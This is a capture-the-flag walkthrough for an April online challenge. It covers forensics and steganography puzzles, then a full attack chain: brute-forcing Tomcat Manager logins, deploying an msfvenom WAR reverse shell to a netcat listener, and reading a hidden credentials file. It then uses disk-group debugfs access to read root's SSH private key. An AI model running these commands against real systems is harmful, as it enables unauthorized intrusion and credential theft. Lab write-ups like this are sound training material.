Techonquer Online CTF Challenge – April Edition

Techonquer Online CTF Challenge – April Edition

4/4/20252 min read

CTF Walkthrough

Step 1: Malayalam Post

The first task involves analyzing a Malayalam post.

Step 2: Autopsy & URL Encoded Flag

Autopsy is a forensic tool used to recover deleted files.

Steps:

  • Open Autopsy → Load the disk image → Analyze deleted files.

  • Locate a file containing a URL-encoded flag.

  • Decode the flag using:

  • echo "encoded_string" | urldecode

  • The output reveals the flag.

Step 3: Barcode to Steganography

1.Scan the Barcode

  • Use an online barcode scanner or a command-line tool:

  • zbarimg barcode.png

  • The barcode contains a Pastebin URL.

2. Extract the Hidden Image

  • Open the Pastebin link and find hex values.

  • Replace the hex of "ChatGPT Share" with the Pastebin hex.

3. Use Stegseek to Crack the Image

  • The modified image contains hidden data.

  • Extract it using:

  • stegseek image.jpg /usr/share/wordlists/rockyou.txt

  • A password-protected file appears.

4. Retrieve Password & Decode Brainfuck

  • Password extracted: 123456789.

  • Open the .out file inside the extracted data.

  • The file is encoded in Brainfuck language.

  • Decode using:

  • echo "brainfuck_code_here" | bf

  • The output reveals the flag.

Step 4: Network Scanning & Tomcat Exploitation

Step 4.1: Scan the Network

  • Scan the target machine for open ports:

  • nmap -p- <target_ip>

  • Discovered Ports:

  • Port 8080 → Apache Tomcat.

  • Port 80 → A file user.py with hints about a username.

Step 4.2: Brute Force Tomcat Credentials

  • Extract the username from user.py.

  • Use BurpSuite Intruder to brute-force the password:

  • Load Tomcat’s 1000 worst passwords.

  • Attack type: Cluster Bomb.

  • Found credentials: Username: tomcat, Password: tomcat.

Step 4.3: Deploying a WAR Shell

  • 1. Login to Tomcat Manager using the credentials.

  • 2. Generate a WAR reverse shell:

  • msfvenom -p java/jsp_shell_reverse_tcp LHOST=<your_ip> LPORT=<your_port> -f war > shell.war

  • 3. Upload the shell.war file in Tomcat Manager.

  • 4. Start a Netcat Listener:

  • nc -lvnp <your_port>

  • 5. Trigger the shell:

  • http://<target_ip>:8080/shell/

  • 6. Reverse shell access obtained!

Step 5: Privilege Escalation

Step 5.1: Find User Credentials

  • Navigate to /opt/ and find a hidden file .user.

  • Open it:

  • cat /opt/.user

  • It contains APT user credentials.

Step 5.2: SSH into APT User

  • Switch to the apt user:

  • su apt

  • Check user groups:

  • id

  • The user belongs to the disk group, meaning they have access to raw disk data.

Step 5.3: Reading Root SSH Key via Debugfs

1. List available disks:

  • fdisk -l

  • Identified disk: /dev/sda1.

2. Use debugfs to read the root SSH key:

  • debugfs /dev/sda1

  • Inside debugfs:

  • mkdir test

  • cat /root/.ssh/id_rsa

3. Copy the id_rsa private key.

Step 6: Gaining Root Access

Step 6.1: Using the SSH Private Key

  • Save the key on your attacker machine:

  • echo "PRIVATE_KEY_HERE" > id_rsa

  • chmod 600 id_rsa

  • Use SSH to log in as root:

  • ssh -i id_rsa root@<target_ip>

Step 6.2: Capture the Root Flag

  • Navigate to the root directory:

  • cd /root

  • Read the final flag:

  • cat flag.txt